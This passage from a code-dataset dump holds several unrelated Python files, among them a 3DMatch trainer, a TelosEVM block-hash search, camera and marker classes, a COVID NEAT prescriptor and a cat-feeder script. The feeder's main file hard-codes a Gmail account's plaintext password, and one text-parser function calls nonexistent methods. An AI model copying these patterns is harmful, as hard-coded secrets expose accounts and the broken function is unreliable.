self._prepare_input(data)\n\n y_src, yw_src = self.model(in_tensor_src)\n y_tgt, yw_tgt = self.model(in_tensor_tgt)\n \n self.optimizer.zero_grad()\n\n if self.opt.train_loss.equi_alpha > 0:\n self.loss, inv_info, equi_info = self.metric(y_src, y_tgt, gt_T, yw_src, yw_tgt)\n invloss, pos_loss, neg_loss, accuracy = inv_info\n equiloss, equi_accuracy, equi_pos_loss, equi_neg_loss = equi_info\n else:\n self.loss, accuracy, pos_loss, neg_loss = self.metric(y_src, y_tgt, gt_T)\n \n self.loss.backward()\n self.optimizer.step()\n\n # Log training stats\n if self.opt.train_loss.equi_alpha > 0:\n log_info = {\n 'Loss': self.loss.item(),\n 'InvLoss': invloss.item(),\n 'Pos': pos_loss.item(),\n 'Neg': neg_loss.item(),\n 'Acc': 100 * accuracy.item(),\n 'EquiLoss': equiloss.item(),\n 'EquiPos': equi_pos_loss.item(),\n 'EquiNeg': equi_neg_loss.item(),\n 'EquiAcc': 100 * equi_accuracy.item(),\n }\n else:\n log_info = {\n 'Loss': self.loss.item(),\n 'Pos': pos_loss.item(),\n 'Neg': neg_loss.item(),\n 'Acc': 100 * accuracy.item(),\n }\n self.summary.update(log_info)\n self.iter_counter += 1\n\n\n def _print_running_stats(self, step):\n stats = self.summary.get()\n self.logger.log('Training', f'{step}: {stats}')\n # self.summary.reset(['Loss', 'Pos', 'Neg', 'Acc', 'InvAcc'])\n\n def test(self):\n pass\n\n def eval(self, select):\n '''\n 3D Match evaluation.\n '''\n from SPConvNets.datasets import evaluation_3dmatch as eval3dmatch\n\n # set up where to store the output feature\n all_results = dict()\n for scene in select:\n assert osp.isdir(osp.join(self.opt.dataset_path, scene))\n print(f\"Working on scene {scene}...\")\n target_folder = osp.join('data/evaluate/3DMatch/', self.opt.experiment_id, scene, f'{self.opt.model.output_num}_dim')\n self._setup_eval_datasets(scene)\n self._generate(target_folder)\n # recalls: [tau, ratio]\n results = eval3dmatch.evaluate_scene(self.opt.dataset_path, target_folder, scene)\n all_results[scene] = results \n self._write_csv(all_results)\n print(\"Done!\")\n\n\n def _generate(self, target_folder):\n with torch.no_grad():\n self.model.eval()\n bs = self.opt.batch_size\n\n print(\"\\n---------- Evaluating the network! 
------------------\")\n\n ################### EVAL LOADER ###############################3\n from tqdm import tqdm\n for it, data in enumerate(self.dataset_eval):\n sid = data['sid'].item()\n # scene = data['scene']\n\n checknan = lambda tensor: torch.sum(torch.isnan(tensor))\n \n print(\"\\nWorking on fragment id\", sid)\n n_keypoints = data['clouds'].shape[0]\n # 5000 x N x 3\n clouds = data['clouds'].to(self.opt.device).squeeze()\n npt = clouds.shape[0]\n\n feature_buffer = []\n for bi in tqdm(range(0, npt, bs)):\n in_tensor_test = clouds[bi : min(npt,bi+bs)]\n feature, _ = self.model(in_tensor_test)\n feature_np = feature.detach().cpu().numpy()\n if checknan(feature).item() > 0:\n feature_np = np.nan_to_num(feature_np)\n feature_buffer.append(feature_np)\n # print(\"Batch counter at %d/%d\"%(bi, npt), end='\\r')\n\n # target_folder = osp.join('data/evaluate/3DMatch/', self.opt.experiment_id, scene, f'{self.opt.model.output_num}_dim')\n os.makedirs(target_folder, exist_ok=True)\n feature_out = np.vstack(feature_buffer)\n out_path = osp.join(target_folder, \"feature%d.npy\"%sid)\n print(f\"\\nSaving features to {out_path}\")\n np.save(out_path, feature_out)\n ######################################################################\n\n\n def _write_csv(self, results):\n import csv\n from SPConvNets.datasets import evaluation_3dmatch as eval3dmatch\n csvpath_root = osp.join('trained_models/evaluate/3DMatch/', self.opt.experiment_id)\n os.makedirs(csvpath_root, exist_ok=True)\n csvpath = osp.join( csvpath_root, 'recall.csv')\n with open(csvpath, 'w', newline='') as csvfile:\n fieldnames = ['Scene'] + ['tau_%.2f'%tau for tau in eval3dmatch.TAU_RANGE]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for scene in results.keys():\n recalls = results[scene]\n row = dict()\n row['Scene'] = scene\n for tup in recalls:\n tau, ratio = tup\n row['tau_%.2f'%tau] = \"%.2f\"%ratio\n writer.writerow(row)\n\n ### print out the stats\n all_recall = []\n for scene in results.keys():\n tau, ratio = results[scene][0]\n print(\"%s recall is %.2f at tau %.2f\"%(scene, ratio, tau))\n all_recall.append(ratio)\n\n avg = np.array(all_recall).mean()\n print(\"Average recall is %.2f !\" % avg)\n \n","repo_name":"nintendops/EPN_PointCloud","sub_path":"SPConvNets/trainer_3dmatch.py","file_name":"trainer_3dmatch.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"21"} +{"seq_id":"70437324214","text":"import subprocess\nimport json\n\n# Start and end block numbers\nstartBlock = 180698860\nendBlock = 200000000\n\nURL1 = \"http://141.193.240.11:12000/evm\"\nURL2 = \"http://169.197.142.4:7000/evm\"\n\ndef fetchHash(blockNumber, url):\n # Convert block number to hexadecimal format\n hexBlockNumber = hex(blockNumber)\n\n # Use curl to make a request\n command = f'curl --data \\'{{\"method\":\"eth_getBlockByNumber\",\"params\":[\"{hexBlockNumber}\",true],\"id\":292771713,\"jsonrpc\":\"2.0\"}}\\' -H \"Content-Type: application/json\" -X POST {url} | jq'\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n output, error = process.communicate()\n\n # Parse the JSON response\n response = json.loads(output)\n\n return response[\"result\"][\"hash\"]\n\ndef binarySearchMismatch(start, end):\n if start > end:\n return None\n\n midBlock = (start + end) // 2\n\n hashA = fetchHash(midBlock, URL1)\n hashB = fetchHash(midBlock, URL2)\n\n if hashA != hashB:\n print(f\"Mismatched hash at block 
{midBlock}\")\n return midBlock\n\n # Search in the first half\n leftResult = binarySearchMismatch(start, midBlock-1)\n if leftResult:\n return leftResult\n\n # Search in the second half\n rightResult = binarySearchMismatch(midBlock+1, end)\n if rightResult:\n return rightResult\n\n# Start the search\nbinarySearchMismatch(startBlock, endBlock)\n","repo_name":"jbuice/TelosEVM-Binary-Tree-Search","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16813853384","text":"\"\"\"\n@author(s): Nathan Heidt, Jean Nassar\n\nThis creates streaming image instances using a usb camera, pi camera, or even a\nvideo file.\n\n\"\"\"\nimport enum\nfrom fractions import Fraction\nimport os\nimport time\n\nimport cv2\n\n# we import like this in case we're not on a raspberry pi\ntry:\n import picamera\n import picamera.array\nexcept ImportError:\n pass\n\n\nCameraType = enum.Enum('CameraType', 'pi cv custom')\n\n\nclass Camera(object):\n \"\"\"\n This class handles image source and streams.\n\n Parameters\n ----------\n source : str, int\n If passed the path to a video file, the Camera class will use that\n as the streaming source. If passed an integer, the class will use\n the index of the available attached camera devices.\n\n Attributes\n ----------\n previous_frame : cv2.Image\n This is an OpenCV datatype that holds the previous frame collected\n current_frame : cv2.Image\n This is an OpenCV datatype that holds the current frame\n camera : cv2.VideoCapture\n This class is used as a wrapper to stream frames from a video source\n instance : _Camera\n A singleton instance for camera access.\n camera_type : CameraType\n An enum used to reference the streaming source\n \"\"\"\n class _Camera(object):\n def __init__(self, source=None):\n self.previous_frame = None\n self.current_frame = None\n operating_system = os.uname()[-1]\n\n # if an rpi\n if source is None:\n if 'arm' in operating_system:\n self.camera_type = CameraType.pi\n else:\n self.camera_type = CameraType.cv\n else:\n self.camera_type = CameraType.custom\n\n if self.camera_type == CameraType.pi:\n self.camera = picamera.PiCamera()\n time.sleep(2)\n self.camera.resolution = (1280, 720)\n self.camera.framerate = Fraction(1, 6)\n self.camera.exposure_mode = 'off'\n self.camera.shutter_speed = 6000000\n self.camera.iso = 800\n elif self.camera_type == CameraType.cv:\n self.camera = cv2.VideoCapture(0)\n elif self.camera_type == CameraType.custom:\n self.camera = cv2.VideoCapture(source)\n\n def get_frame(self):\n \"\"\"\n Gets the next frame from the video stream. 
Querying this will\n retrieve a new frame from the device\n\n \"\"\"\n if self.camera_type == CameraType.pi:\n with picamera.array.PiRGBArray(self.camera) as stream:\n self.camera.capture(stream, format='rgb')\n frame = stream.array\n elif self.camera_type == CameraType.cv:\n ret, frame = self.camera.read()\n elif self.camera_type == CameraType.custom:\n ret, frame = self.camera.read()\n else:\n raise RuntimeError('Cannot get frame: Unknown camera type.')\n\n self.previous_frame = self.current_frame\n self.current_frame = frame\n return frame\n\n def get_previous_frame(self):\n \"\"\"\n After get_frame is called, this can be used to access the previous\n frame\n\n \"\"\"\n if self.previous_frame is None:\n return self.current_frame\n return self.previous_frame\n\n def __del__(self):\n if self.camera_type != CameraType.pi:\n self.camera.release()\n\n instance = None\n\n def __init__(self, source=None):\n if not Camera.instance:\n Camera.instance = Camera._Camera(source)\n else:\n Camera.instance.source = source\n\n def __getattr__(self, name):\n return getattr(self.instance, name)\n","repo_name":"heidtn/MeteorTracker","sub_path":"meteortracker/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":3858,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"11673284984","text":"import numpy as np\r\nfrom collections import deque\r\n\r\nclass Marker:\r\n\r\n n_dims = 3\r\n\r\n def __init__(self, name, initpos=np.array([0,0,0],dtype=float), memory_size=3):\r\n \r\n if len(initpos) != 3:\r\n raise ValueError(\"Position must be a 1x3 array or list.\")\r\n if isinstance(initpos, type(np.array([]))):\r\n self.pos = initpos\r\n else:\r\n self.pos = np.array(initpos, dtype=float)\r\n self.visible = False\r\n self.name = name\r\n self.memory_size = memory_size\r\n self.old_pos = deque([self.pos]*self.memory_size, maxlen=self.memory_size)\r\n\r\n def update_pos(self, new_pos, update_history=False):\r\n if len(new_pos) != Marker.n_dims:\r\n raise Exception(\"Incorrect dimensions for updating positon\")\r\n if update_history:\r\n self.old_pos.popleft()\r\n self.old_pos.append(self.pos)\r\n self.pos = np.array(new_pos, dtype=float)\r\n\r\n def get_pos(self):\r\n return self.pos\r\n\r\n def get_previous_positions(self, stop_drift=True):\r\n \"\"\"\r\n Stop drift will set all previous positions to current position if the marker has not been\r\n visible for the length of it's memory.\r\n\r\n Return: numpy array of previous positions and current position of marker \r\n from oldest to newest going from row 0->self.memory_size+1 (current position at end)\r\n \"\"\"\r\n previous_points = np.zeros((self.memory_size+1, Marker.n_dims))\r\n try:\r\n for i in range(self.memory_size):\r\n previous_points[i][:] = self.old_pos[i]\r\n except IndexError:\r\n pass\r\n previous_points[self.memory_size][:] = self.pos\r\n return previous_points\r\n\r\n def set_to_visible(self):\r\n self.visible = True\r\n\r\n def set_to_invisible(self):\r\n # call if you don't want to update position (ie. 
not a complete frame time)\r\n        self.visible = False\r\n\r\n    def is_visible(self):\r\n        return self.visible\r\n\r\n    def __repr__(self):\r\n        out_list = []\r\n        out_list.append(\"Marker<<\")\r\n        out_list.append(\"Name: %s, \" % self.name)\r\n        out_list.append(\"Previous Positions: %s, \" % str(self.old_pos))\r\n        out_list.append(\"Current Position: %s, \" % str(self.pos))\r\n        out_list.append(\"Visible: %s\" % str(self.visible))\r\n        out_list.append(\">>\")\r\n        return \"\".join(out_list)\r\n\r\nif __name__ == \"__main__\":\r\n    mk = Marker(\"test\")\r\n    print(mk.get_previous_positions())\r\n    print()\r\n    mk.update_pos([1,1,1])\r\n    print(mk.get_previous_positions())\r\n    print()\r\n    mk.update_pos([2,2,2])\r\n    print(mk.get_previous_positions())\r\n    print()\r\n    mk.update_pos([3,2,2])\r\n    print(mk.get_previous_positions())\r\n    print()\r\n    mk.update_pos([4,2,2])\r\n    print(mk.get_previous_positions())\r\n    print()\r\n    mk.update_pos([5,2,2])\r\n    print(mk.get_previous_positions())","repo_name":"danivi2000/UofA_Fixed_Comp_2020","sub_path":"bodyTracking/marker_class.py","file_name":"marker_class.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"35635148626","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/3/15 0015\n# @Author : yang\n# @Email : 2635681517@qq.com\n# @File : 79.py\n\"\"\"Compute the sum 1 + 2! + 3! + ... + 20!.\"\"\"\n\n\ndef f(n):\n    \"\"\"Compute the factorial\"\"\"\n    sun = 1\n    for i in range(1, n + 1):\n        sun = sun * i\n    return sun\n\n\ndef su(n):\n    rest = 0\n    for i in range(1, n + 1):\n        rest += f(i)\n    return rest\n\n\nif __name__ == \"__main__\":\n    print(su(20))\n    print(f(4))\n","repo_name":"Futureword123456/PythonSystemStudy","sub_path":"com/Pythonbaseknowledge/Interview/8/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"17898768120","text":"import logging\n\nfrom tqdm import tqdm\n\nfrom repositories.film import FilmStatus\nfrom repositories.queue_utils import QueueUtils\nfrom repositories.sqlbase import Session\nfrom worker.date_time_utils import SecondsPeriodBuilder\nfrom worker.fetching.review_fetcher_utils import get_k_reviews\nfrom worker.tasks.task import Task\n\n\nclass ReviewFetcherTask(Task):\n    _name = 'ReviewFetcherTask'\n    postgres_session = Session\n\n    def __init__(self, queue: QueueUtils):\n        self.queue = queue\n        self.logger = logging.getLogger('taskManager.' 
+ self._name)\n\n def name(self):\n return self._name\n\n def time_period(self):\n return SecondsPeriodBuilder().add_hours(5).build()\n\n # def delay(self):\n # return SecondsPeriodBuilder().add_minutes(5).build()\n\n def run(self):\n self.logger.info(\"Getting movies from queue...\")\n films = self.queue.get_all_films_from_queue(FilmStatus.INFO_FETCHED)\n self.logger.info(\"Got {0} movies from queue\".format(len(films)))\n\n self.logger.info(\"Getting reviews from KP...\")\n reviews_by_film_id = {}\n reviews_count = 0\n # hundreds = 0\n for i in tqdm(range(len(films))):\n film = films[i]\n reviews = get_k_reviews(film.film_id, 4)\n reviews_count += len(reviews)\n # if reviews_count // 100 > hundreds:\n # hundreds = reviews_count // 100\n # self.logger.info(\"Already got {0}\".format(reviews_count))\n # self.logger.info(\"Last film {0}\".format(film.film_id))\n reviews_by_film_id[film.film_id] = reviews\n # self.queue.change_film_status(film.film_id, FilmStatus.REVIEWS_FETCHING)\n self.logger.info(\"Got {0} reviews from queue\".format(reviews_count))\n\n self.logger.info(\"Saving reviews to queue...\")\n reviews_count = 0\n for film_id, reviews in reviews_by_film_id.items():\n for review in reviews:\n self.queue.append_review(review)\n reviews_count += 1\n self.queue.change_film_status(film_id, FilmStatus.PROCESSED)\n self.logger.info(\"Saved {0} reviews to queue\".format(reviews_count))\n","repo_name":"dapodshivalov/movie_search_server","sub_path":"worker/tasks/review_fetcher_task.py","file_name":"review_fetcher_task.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24481631211","text":"#task_F\nn = int(input())\ns = input()\nA = list(map(int, s.split()))\nm = abs(A[0] - A[1])\nx1 = 0\nx2 = 1\nfor i in range(len(A)):\n\tfor j in range(i + 1, len(A)):\n\t\tif m > abs(A[i] - A[j]):\n\t\t\tm = abs(A[i] - A[j])\n\t\t\tx1 = i\n\t\t\tx2 = j\nprint(x1, x2)\n\n","repo_name":"Senbjorn/mipt_lab_2016","sub_path":"contest_5/task_F.py","file_name":"task_F.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73393115251","text":"from django.utils.translation import gettext_lazy as _\nfrom rest_framework.utils.serializer_helpers import OrderedDict, ReturnDict\nfrom rest_framework.views import exception_handler\n\nfrom ..schemas.response import DefaultResponse\n\nUNKNOWN_ERROR = _(\"Unknown error while processing your request.\")\nNON_FIELDS_ERRORS = [\"detail\", \"non_field_errors\"]\n\n\ndef _stringify_non_generic_types(data):\n \"\"\"Remove non-generic types from values of dict or list\n For example: {'detail': [ErrorDetail(message = 'Unknown error')]}\n Will be converted to: {'detail': ['Unknown error']} (by str representation of ErrorDetail)\n \"\"\"\n if type(data) is list:\n for index, item in enumerate(data):\n data[index] = _stringify_non_generic_types(item)\n elif type(data) in [dict, OrderedDict, ReturnDict]:\n for key, value in data.items():\n data[key] = _stringify_non_generic_types(value)\n elif type(data) not in [str, int, bool, float]:\n return str(data) if data is not None else UNKNOWN_ERROR\n return data\n\n\ndef _get_error_message_with_validation_errors(\n error_data: dict | OrderedDict | ReturnDict | list | str,\n) -> tuple[str, dict, bool]:\n message, validation_errors, has_child = UNKNOWN_ERROR, {}, False\n if type(error_data) is list and len(error_data) > 0:\n error_item = 
error_data[0]\n child_message, child_validation_errors, child_has_child = _get_error_message_with_validation_errors(error_item)\n has_child = len(child_validation_errors) > 0 or child_has_child\n message = child_message\n elif type(error_data) in [dict, OrderedDict, ReturnDict] and len(error_data.keys()) > 0:\n validation_errors = error_data\n for field_name, child_error_data in error_data.items():\n child_message, child_validation_errors, child_has_child = _get_error_message_with_validation_errors(\n child_error_data\n )\n delimiter = \":\" if (not child_has_child and len(child_validation_errors) == 0) else \" >\"\n has_child = len(child_validation_errors) > 0 or child_has_child\n message = f\"{field_name}{delimiter} {child_message}\"\n break\n elif type(error_data) is str:\n has_child = False\n message = error_data\n else:\n has_child = False\n message = UNKNOWN_ERROR\n return message, validation_errors, has_child\n\n\ndef drf_exception_handler(exc, context):\n response = exception_handler(exc, context)\n\n if response is not None:\n default_data = DefaultResponse(\n success=False,\n status_code=response.status_code,\n message=_(\"Unknown error while processing your request.\"),\n validation_errors={},\n data=None,\n ).to_dict()\n error_data: str | dict | OrderedDict | ReturnDict | list = _stringify_non_generic_types(response.data or {})\n error_message, validation_errors, __ = _get_error_message_with_validation_errors(error_data)\n for non_field_error in NON_FIELDS_ERRORS:\n replace_text = f\"{non_field_error}: \"\n if error_message.startswith(replace_text):\n error_message = error_message.replace(replace_text, \"\")\n default_data[\"message\"] = error_message\n default_data[\"validation_errors\"] = validation_errors\n response.data = default_data\n else:\n default_data = DefaultResponse(\n success=False,\n status_code=500,\n message=str(exc),\n validation_errors={},\n data=None,\n )\n response = default_data\n\n return response\n","repo_name":"riso-tech/django-saas","sub_path":"one/utils/rest_framework/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17667000419","text":"import os\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom copy import deepcopy\n\nimport neat\n\n# Path to file containing neat prescriptors. 
Here we simply use a\n# recent checkpoint of the population from train_prescriptor.py,\n# but this is likely not the most complementary set of prescriptors.\n# Many approaches can be taken to generate/collect more diverse sets.\n# Note: this set can contain up to 10 prescriptors for evaluation.\nfrom covid_xprize.examples.prescriptors.neat.utils import prepare_historical_df, CASES_COL, IP_COLS, IP_MAX_VALUES, \\\n add_geo_id, get_predictions, PRED_CASES_COL\n\nPRESCRIPTORS_FILE = 'neat-checkpoint-0'\n\n# Number of days the prescriptors look at in the past.\nNB_LOOKBACK_DAYS = 14\n\n\ndef prescribe(start_date_str: str,\n end_date_str: str,\n path_to_prior_ips_file: str,\n path_to_cost_file: str,\n output_file_path) -> None:\n\n start_date = pd.to_datetime(start_date_str, format='%Y-%m-%d')\n end_date = pd.to_datetime(end_date_str, format='%Y-%m-%d')\n\n # Load historical data with basic preprocessing\n print(\"Loading historical data...\")\n df = prepare_historical_df()\n\n # Restrict it to dates before the start_date\n df = df[df['Date'] <= start_date]\n\n # Fill in any missing case data using predictor given ips_df.\n # todo: ignore ips_df for now, and instead assume we have case\n # data for all days and geos up until the start_date.\n\n # Create historical data arrays for all geos\n past_cases = {}\n past_ips = {}\n for geo in df['GeoID'].unique():\n geo_df = df[df['GeoID'] == geo]\n past_cases[geo] = np.maximum(0, np.array(geo_df[CASES_COL]))\n past_ips[geo] = np.array(geo_df[IP_COLS])\n\n # Gather values for scaling network output\n ip_max_values_arr = np.array([IP_MAX_VALUES[ip] for ip in IP_COLS])\n\n # Load prescriptors\n checkpoint = neat.Checkpointer.restore_checkpoint(PRESCRIPTORS_FILE)\n prescriptors = checkpoint.population.values()\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,\n neat.DefaultSpeciesSet, neat.DefaultStagnation,\n 'config-prescriptor')\n\n # Load IP costs to condition prescriptions\n cost_df = pd.read_csv(path_to_cost_file)\n cost_df['RegionName'] = cost_df['RegionName'].fillna(\"\")\n cost_df = add_geo_id(cost_df)\n geo_costs = {}\n for geo in cost_df['GeoID'].unique():\n costs = cost_df[cost_df['GeoID'] == geo]\n cost_arr = np.array(costs[IP_COLS])[0]\n geo_costs[geo] = cost_arr\n\n # Generate prescriptions\n prescription_dfs = []\n for prescription_idx, prescriptor in enumerate(prescriptors):\n print(\"Generating prescription\", prescription_idx, \"...\")\n\n # Create net from genome\n net = neat.nn.FeedForwardNetwork.create(prescriptor, config)\n\n # Set up dictionary for keeping track of prescription\n df_dict = {'CountryName': [], 'RegionName': [], 'Date': []}\n for ip_col in sorted(IP_MAX_VALUES.keys()):\n df_dict[ip_col] = []\n\n # Set initial data\n eval_past_cases = deepcopy(past_cases)\n eval_past_ips = deepcopy(past_ips)\n\n # Generate prescriptions one day at a time, feeding resulting\n # predictions from the predictor back into the prescriptor.\n for date in pd.date_range(start_date, end_date):\n date_str = date.strftime(\"%Y-%m-%d\")\n\n # Get prescription for all regions\n for geo in df['GeoID'].unique():\n\n # Prepare input data. 
Here we use log to place cases\n # on a reasonable scale; many other approaches are possible.\n X_cases = np.log(eval_past_cases[geo][-NB_LOOKBACK_DAYS:] + 1)\n X_ips = eval_past_ips[geo][-NB_LOOKBACK_DAYS:]\n X_costs = geo_costs[geo]\n X = np.concatenate([X_cases.flatten(),\n X_ips.flatten(),\n X_costs])\n\n # Get prescription\n prescribed_ips = net.activate(X)\n\n # Map prescription to integer outputs\n prescribed_ips = (prescribed_ips * ip_max_values_arr).round()\n\n # Add it to prescription dictionary\n country_name, region_name = geo.split('__')\n if region_name == 'nan':\n region_name = np.nan\n df_dict['CountryName'].append(country_name)\n df_dict['RegionName'].append(region_name)\n df_dict['Date'].append(date_str)\n for ip_col, prescribed_ip in zip(IP_COLS, prescribed_ips):\n df_dict[ip_col].append(prescribed_ip)\n\n # Create dataframe from prescriptions\n pres_df = pd.DataFrame(df_dict)\n\n # Make prediction given prescription for all countries\n pred_df = get_predictions(start_date_str, date_str, pres_df)\n\n # Update past data with new day of prescriptions and predictions\n pres_df['GeoID'] = pres_df['CountryName'] + '__' + pres_df['RegionName'].astype(str)\n pred_df['RegionName'] = pred_df['RegionName'].fillna(\"\")\n pred_df['GeoID'] = pred_df['CountryName'] + '__' + pred_df['RegionName'].astype(str)\n new_pres_df = pres_df[pres_df['Date'] == date_str]\n new_pred_df = pred_df[pred_df['Date'] == date_str]\n for geo in df['GeoID'].unique():\n geo_pres = new_pres_df[new_pres_df['GeoID'] == geo]\n geo_pred = new_pred_df[new_pred_df['GeoID'] == geo]\n\n # Append array of prescriptions\n pres_arr = np.array([geo_pres[ip_col].values[0] for ip_col in IP_COLS]).reshape(1,-1)\n eval_past_ips[geo] = np.concatenate([eval_past_ips[geo], pres_arr])\n\n # It is possible that the predictor does not return values for some regions.\n # To make sure we generate full prescriptions, this script continues anyway.\n # Geos that are ignored in this way by the predictor, will not be used in\n # quantitative evaluation. 
A list of such geos can be found in unused_geos.txt.\n if len(geo_pred) != 0:\n eval_past_cases[geo] = np.append(eval_past_cases[geo],\n geo_pred[PRED_CASES_COL].values[0])\n\n # Add prescription df to list of all prescriptions for this submission\n pres_df['PrescriptionIndex'] = prescription_idx\n prescription_dfs.append(pres_df)\n\n # Combine dfs for all prescriptions into a single df for the submission\n prescription_df = pd.concat(prescription_dfs)\n\n # Create the output path\n os.makedirs(os.path.dirname(output_file_path), exist_ok=True)\n\n # Save to a csv file\n prescription_df.to_csv(output_file_path, index=False)\n print('Prescriptions saved to', output_file_path)\n\n return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--start_date\",\n dest=\"start_date\",\n type=str,\n required=True,\n help=\"Start date from which to prescribe, included, as YYYY-MM-DD.\"\n \"For example 2020-08-01\")\n parser.add_argument(\"-e\", \"--end_date\",\n dest=\"end_date\",\n type=str,\n required=True,\n help=\"End date for the last prescription, included, as YYYY-MM-DD.\"\n \"For example 2020-08-31\")\n parser.add_argument(\"-ip\", \"--interventions_past\",\n dest=\"prior_ips_file\",\n type=str,\n required=True,\n help=\"The path to a .csv file of previous intervention plans\")\n parser.add_argument(\"-c\", \"--intervention_costs\",\n dest=\"cost_file\",\n type=str,\n required=True,\n help=\"Path to a .csv file containing the cost of each IP for each geo\")\n parser.add_argument(\"-o\", \"--output_file\",\n dest=\"output_file\",\n type=str,\n required=True,\n help=\"The path to an intervention plan .csv file\")\n args = parser.parse_args()\n print(f\"Generating prescriptions from {args.start_date} to {args.end_date}...\")\n prescribe(args.start_date, args.end_date, args.prior_ips_file, args.cost_file, args.output_file)\n print(\"Done!\")\n","repo_name":"katherinesing/usc-xprize-covid","sub_path":"covid-xprize/covid_xprize/examples/prescriptors/neat/prescribe.py","file_name":"prescribe.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31912043368","text":"def stringToDict(string):\n #Parse text\n letters = \"abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ-'\"\n string = string + \" \"\n words = {}\n currentWord = \"\"\n wordIsStarted = False\n for i in range(0, len(string)):\n character = string[i]\n if character in letters:\n wordIsStarted = True\n currentWord += character\n else:\n if wordIsStarted:\n if currentWord in words:\n words[currentWord] += 1\n else:\n words[currentWord] = 1\n currentWord = \"\"\n wordIsStarted = False\n\n return sortDictReverse(words)\n\ndef stringToList(string):\n letters = \"abcdefghijklmnopqrstuvwzyzABCDEFGHIJKLMNOPQRSTUVWXYZ-',\"\n string = string + \" \"\n words = []\n currentWord = \"\"\n wordIsStarted = False\n for i in range(0, len(string)):\n character = string[i]\n if character in letters:\n wordIsStarted = True\n currentWord += character\n elif character == \".\":\n if wordIsStarted:\n words.append(currentWord)\n words.append(\".\")\n currentWord = \"\"\n wordIsStarted = False\n else:\n if wordIsStarted:\n words.append(currentWord)\n currentWord = \"\"\n wordIsStarted = False\n\n return words\n \n \n\n\ndef sortDictReverse(dictionary):\n \n #Sort dictionary in reverse number order\n newDict = {}\n for i in range(0, len(sorted(dictionary.values()))):\n for key in dictionary.keys():\n if 
dictionary[key] == sorted(dictionary.values())[len(sorted(dictionary.values())) - i - 1]:\n newDict[key] = sorted(dictionary.values())[len(sorted(dictionary.values())) - i - 1]\n \n return newDict\n\ndef combineDix(dict1, dict2):\n #This adds together two dictionaries whose values are integers\n for key, value in dict1.items():\n if key in dict2.keys():\n dict2[key] += value\n else:\n dict2[key] = value\n\n return sortDictReverse(dict2)\n\ndef sentenceBreakdown(sentence):\n words = stringToList(sentence)\n for i in range(0, len(words)):\n if words[i].isNoun:\n if words[i + 1].isVerb:\n noun = words[i]\n","repo_name":"sestinj/edgar-allen-poetry","sub_path":"TextParser.py","file_name":"TextParser.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31184578681","text":"from Email import *\nfrom Motor import *\nimport time\nimport schedule\n\ndef initialization():\n print(\"Auto-Cat initializing\")\n email = Email(465,'Auto.Cat.Messaging@gmail.com','AutoCatProject')\n motor = Motor(21,50,5)\n #schedule.every(1).minutes.do(email.sendEmail,'sergio.c.842@gmail.com','This is a test')\n #schedule.every().day.at(\"22:19\").do(email.sendEmail,'eliazar.d.842@gmail.com','hey :)')\n schedule.every(1).minutes.do(motor.feed,10,5)\n #Add any other initializing components here\n print(\"Auto-Cat initializing complete\")\n\ndef main():\n #Call initilization function\n initialization()\n\n #loop forever\n while True:\n print('Auto-Cat running')\n schedule.run_pending()\n time.sleep(1)\n \n#Call main function\nmain()\n","repo_name":"SurgeCS/Auto-Cat","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3901605900","text":"# Problem:\n# https://leetcode.com/contest/weekly-contest-77/problems/max-increase-to-keep-city-skyline/\n# Difficulty: Medium\n# Runtime: 57ms\n# I solved this as a part of contest 27 in 9 minutes.\n\nclass Solution(object):\n def maxIncreaseKeepingSkyline(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n max_in_rows = []\n max_in_cols = []\n cols = []\n for i in range(0, len(grid[0])):\n cols.append([])\n \n for row in grid:\n m = max(row)\n max_in_rows.append(m)\n for idx, item in enumerate(row):\n cols[idx].append(item)\n \n for col in cols:\n max_in_cols.append(max(col))\n \n total_change = 0\n for idx_g, row in enumerate(grid):\n for idx_r, item in enumerate(row):\n max_val = min(max_in_rows[idx_g], max_in_cols[idx_r])\n change = max_val - item\n total_change += change\n \n return total_change\n ","repo_name":"DanielPBak/Practice-Work","sub_path":"leetcode/Medium Questions/max_increase_to_skyline.py","file_name":"max_increase_to_skyline.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"22462433739","text":"import sys\nimport math\nimport torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom datetime import datetime\nimport gc\nfrom torch.nn.utils.rnn import 